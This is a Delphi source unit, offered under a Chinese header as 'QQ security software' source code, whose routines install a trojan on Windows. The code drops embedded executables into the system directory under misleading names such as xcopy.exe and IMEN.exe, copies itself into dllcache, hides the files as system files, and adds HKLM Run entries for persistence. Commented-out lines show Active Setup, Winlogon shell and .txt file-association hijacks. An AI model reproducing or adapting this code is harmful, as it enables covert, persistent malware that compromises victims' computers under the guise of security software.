reg.pas

DEILPHI写的QQ安全软件源码!功能全套,该有的全有了,欢迎交流

unit REG;

interface
procedure CreateREG();
procedure DElREG();

implementation
 uses
  Windows, Messages, UrlPost, ExtInfo,VarUnit,FunUnit,registry;


  //注册表函数
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
  result := false;
  RegCreateKey(key,PChar(subkey),regkey);
  if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
    result := true;
  RegCloseKey(regkey);
end;

procedure CreateREG();
   var
  BadCode: array[0..500] of Char;
  datee:string;
    PDA:Boolean;
    PDB:Boolean;
    PDC:Boolean;
    PDD:Boolean;
    PDE:Boolean;
    PDF:Boolean;
    MSdos:string;
    MSdosBAK:string;
    EXEbak:string;
begin
   ComDLL_FileNameA := GetDirectory(1)+'xcopy.exe';
   ComDLL_FileNameB := GetDirectory(1)+'dllcache\Dlls.exe';
   ComDLL_FileNameC := GetDirectory(1)+'IMEN.exe';
   ComDLL_FileNameD := GetDirectory(1)+'Setup\Msmq.exe';

   ComDLL_FileName:= GetDirectory(1)+'Drvce.dll';
   ComDLL_FileName2 := GetDirectory(1)+'dllcache\Dllse.dll';
   ComDLL_FileName3 := GetDirectory(1)+'IMENS.dll';
   ComDLL_FileName4 := GetDirectory(1)+'Setup\Max.dll';
   MSdos:=GetDirectory(1)+'MS_dos.pif';
   MSdosBAK:= GetDirectory(1)+'COM\Mbak.exe';
   EXEbak:= GetDirectory(1)+'COM\Dixbak.exe';

       DeleteFile(BadCode);
       SetFileAttributes(PChar(ComDLL_FileNameA), 0);
     //  SetFileAttributes(PChar(ComDLL_FileNameB), 0);
       SetFileAttributes(PChar(ComDLL_FileNameC), 0);
     //  SetFileAttributes(PChar(ComDLL_FileNameD), 0);
       ResourceToFile(RT_RCDATA, 'EXEFILE', PChar(ComDLL_FileNameA));
       ResourceToFile(RT_RCDATA, 'EXEFILE', PChar(EXEbak));
       ResourceToFile(RT_RCDATA, 'EXEFILE', PChar(ComDLL_FileNameC));
      // ResourceToFile(RT_RCDATA, 'EXEFILE', PChar(ComDLL_FileNameD));
     //  skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}','StubPath',ComDLL_FileNameC);
      // RegDeleteKey(HKEY_current_user,'SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}');
  //     skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155516}','StubPath',MSdos);
 //      RegDeleteKey(HKEY_current_user,'SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155516}');
   //    skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','shell','EXPLORER.EXE %System%\IMEN.exe');
     //  RegDeleteKey(HKEY_current_user,'SOFTWARE\Microsoft\Active Setup\Installed Components\{E9C0568A-0146-9ACE-2347-9ACE13568ABD}');
  //     skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{A37AE135-9BD0-3468-ACD0-3467ACE02457}','StubPath',MSdos);
  //     RegDeleteKey(HKEY_current_user,'SOFTWARE\Microsoft\Active Setup\Installed Components\{A37AE135-9BD0-3468-ACD0-3467ACE02457}');
       skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run','Whatever',ComDLL_FileNameA);
       skrivreg(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run','Windows',ComDLL_FileNameC);
   //    skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx','Flag','dword:0x0000000');
   //    skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\001','RunMyApp',MSdos);
       SetFileAttributes(PChar(ComDLL_FileNameA),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
       SetFileAttributes(PChar(ComDLL_FileNameC),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
        //判断文件是否存在
        PDA:=FileExistsAPI(ComDLL_FileName2);
        if PDA = False then
           begin
              CopyFile(pchar(Paramstr(0)),pchar(ComDLL_FileName2),true);
              SetFileAttributes(PChar(ComDLL_FileName2),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
           end;
        PDB:=FileExistsAPI(ComDLL_FileNameA); //注入程序
        if PDB = False then
           begin
              CopyFile(PChar(EXEbak),pchar(ComDLL_FileNameA),true);
              SetFileAttributes(PChar(ComDLL_FileNameA),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
            end;
      { PDC:=fileexists(ComDLL_FileNameC);
       if PDC = False then
           begin
             CopyFile(PChar(ComDLL_FileNameA),pchar(ComDLL_FileNameC),true);
             SetFileAttributes(PChar(ComDLL_FileNameC),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
            end;
       PDD:=fileexists(ComDLL_FileNameD);
       if PDC = False then
           begin
             CopyFile(PChar(ComDLL_FileNameA),pchar(ComDLL_FileNameD),true);
             SetFileAttributes(PChar(ComDLL_FileNameD),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
            end; }
            PDF:=FileExistsAPI(MSdos); //主安装
            if PDF = False then
                begin
                     CopyFile(PChar(MSdosBAK),pchar(MSdos),true);
                     SetFileAttributes(PChar(MSdos),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
                end;
 end;
procedure DElREG();
var
  ini : TRegIniFile;
     hWND1:HWnd;
begin

   hWND1:= FindWindow('TMainform', 'Shutdown Controller v1.0');
   if  hWND1=0 then
       begin
        ini := TRegIniFile.Create('');
         ini.RootKey:=HKEY_LOCAL_MACHINE;
         if not ini.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',FALSE) then ;
           begin
            ini.DeleteValue('Whatever');
          // ini.DeleteValue('Dos');
            end;
 //  ini.RootKey:=HKEY_CLASSES_ROOT
  //  if not ini.OpenKey('txtfile\shell\open\command',FALSE) then ;
//     ini.Writestring('','%SystemRoot%\system32\2.exe %1');
            ini.Free;
  // RegDeleteKey(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\001');
  // RegDeleteKey(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}');
    end;

  end;
end.